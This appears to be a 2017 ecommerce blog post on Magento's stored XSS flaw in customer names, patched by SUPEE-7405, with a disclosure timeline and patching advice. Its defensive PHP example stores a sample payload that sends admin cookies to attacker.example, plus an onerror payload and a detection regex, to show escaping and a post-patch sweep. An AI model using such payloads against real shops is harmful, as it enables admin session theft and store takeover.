
Magento Platform Releases Patch to Fix Multiple Vulnerabilities

Published June 26, 2017 in Ecommerce News

Magento Platform: If you run your ecommerce shop on Magento, make sure you are up to date with your patches. Hundreds of thousands of sites were exposed to attack through a recently patched vulnerability in the Magento ecommerce platform. If this sounds like déjà vu, that is because Magento was hit by another serious vulnerability only last year.

The bad news is that the stored cross-site scripting (XSS) bug is present in almost every Magento Community Edition release before 1.9.2.3 and every Enterprise Edition release before 1.14.2.3. The core problem is that it lets an attacker put JavaScript code into the customer registration form. All the attacker has to do is click submit: the script is saved with the customer record and runs in the shop owner's browser as soon as an administrator opens that record in the backend, which can hand the attacker control of the shop.

According to Magento, the issue was that, "At the time of customer registration on the storefront, an end-user can provide a user name that consists of JavaScript code. Magento does not correctly validate this name and hence executes it in the Admin context when editing the user in the backend area. This JavaScript code could possibly rip off the admin session or act on behalf of a shop admin".

The vulnerable code sits in Magento's core libraries, more precisely in the admin backend, as Sucuri's advisory explained. Unless you are behind a WAF, or have a very heavily modified admin panel, you are exposed. Because this is a stored XSS vulnerability, attackers can use it to take control of your site, create new admin accounts, steal customer details, and do anything else a legitimate admin account is permitted to do.
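To make the bug class concrete, here is an added example (it is not Magento's own code, and the field names, the sample customer rows and the attacker URL are assumptions). It shows a customer-supplied first name rendered into an admin page with and without output encoding, and a small sweep that flags stored names containing HTML markup, which is worth running after patching because the patch stops the script from executing but does not remove payloads that are already in the database.

```php
<?php
// Added illustration of a stored XSS through an unescaped customer name.
// Example code, not Magento source: field names, sample rows and the
// attacker URL are assumptions made for the demonstration.

declare(strict_types=1);

// Constructed sample input: what a hostile registration form submission
// would leave stored as the customer's first name.
const HOSTILE_FIRSTNAME =
    '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// Vulnerable pattern: the stored value is concatenated straight into the
// admin page's HTML, so whoever opens the customer record runs the script.
function renderCustomerRowVulnerable(string $firstname): string
{
    return '<td class="customer-name">' . $firstname . '</td>';
}

// Hardened pattern: encode on output, for the context the value lands in.
// In a Magento 1 block or template the equivalent is $this->escapeHtml($value).
function renderCustomerRowSafe(string $firstname): string
{
    $encoded = htmlspecialchars($firstname, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<td class="customer-name">' . $encoded . '</td>';
}

// The same value inside an attribute needs the same treatment and a quoted
// attribute; ENT_QUOTES ensures both quote characters are encoded.
function renderCustomerInputSafe(string $firstname): string
{
    $encoded = htmlspecialchars($firstname, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="firstname" value="' . $encoded . '">';
}

// Post-patch sweep: flag stored names that contain markup, event handler
// attributes or javascript: URLs so they can be reviewed by a human.
function findSuspiciousNames(array $customers): array
{
    $hits = [];
    foreach ($customers as $customer) {
        foreach (['firstname', 'lastname'] as $field) {
            $value = $customer[$field] ?? '';
            if (preg_match('/<\s*\/?\s*[a-z][^>]*>|on\w+\s*=|javascript:/i', $value)) {
                $hits[] = [
                    'entity_id' => $customer['entity_id'],
                    'field'     => $field,
                    'value'     => $value,
                ];
            }
        }
    }
    return $hits;
}

// Constructed sample rows standing in for a SELECT from customer_entity.
$sampleCustomers = [
    ['entity_id' => 1, 'firstname' => 'Alice',            'lastname' => 'Example'],
    ['entity_id' => 2, 'firstname' => HOSTILE_FIRSTNAME,  'lastname' => 'Smith'],
    ['entity_id' => 3, 'firstname' => 'Bob',              'lastname' => '<img src=x onerror=alert(1)>'],
];

echo "Vulnerable: ", renderCustomerRowVulnerable(HOSTILE_FIRSTNAME), PHP_EOL;
echo "Safe:       ", renderCustomerRowSafe(HOSTILE_FIRSTNAME), PHP_EOL;
echo "Attribute:  ", renderCustomerInputSafe(HOSTILE_FIRSTNAME), PHP_EOL;
foreach (findSuspiciousNames($sampleCustomers) as $hit) {
    printf("Review customer %d (%s): %s%s", $hit['entity_id'], $hit['field'], $hit['value'], PHP_EOL);
}
```

The fix is output encoding at the point where the value is written into HTML, not input filtering at registration: a name can legitimately contain characters such as apostrophes and ampersands, and a WAF in front of the storefront only helps if it happens to block the payload on the way in. The sweep is deliberately noisy (a name such as "Simon=" would be flagged) because its output is meant for review, not for automatic deletion.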

Timeline for Vulnerability Disclosure:

You might assume that Magento hurried to get the vulnerability patched. According to the timeline released by Sucuri, however, the issue was reported to the company in November 2015 and a patch was not released until January 2016, as the full timeline below shows:

  • November 10, 2015: Bug discovered; initial report to Magento's security team
  • December 1, 2015: No reaction from Magento; Sucuri requests confirmation of the earlier email
  • December 1, 2015: Magento acknowledges receipt of the report
  • January 7, 2016: Sucuri asks for an ETA, 60 days after the first report
  • January 11, 2016: Magento responds that the patch is ready, but no ETA is available
  • January 20, 2016: Magento releases patch package SUPEE-7405, which resolves the issue
  • January 22, 2016: Sucuri publishes the vulnerability

What does this mean for you?

If you have not yet installed the patch, do it sooner rather than later; anything else leaves you exposed to a potentially very dangerous threat. Apply SUPEE-7405 or upgrade to Community Edition 1.9.2.3 / Enterprise Edition 1.14.2.3. On Magento 1 you can confirm that a patch was applied by looking for its name in app/etc/applied.patches.list. Patching stops the stored script from executing, but it does not undo what an attacker may already have done, so also review the admin user list for accounts you did not create and check customer records whose names contain HTML markup. As with any other security patch, there is a reason it was released, so do not play Russian roulette with your online business.


An enthusiastic marketer and ecommerce professional, I started this project to help others make the best choice when it comes to choosing the right ecommerce platform. Check out my top 10 ecommerce website builders.
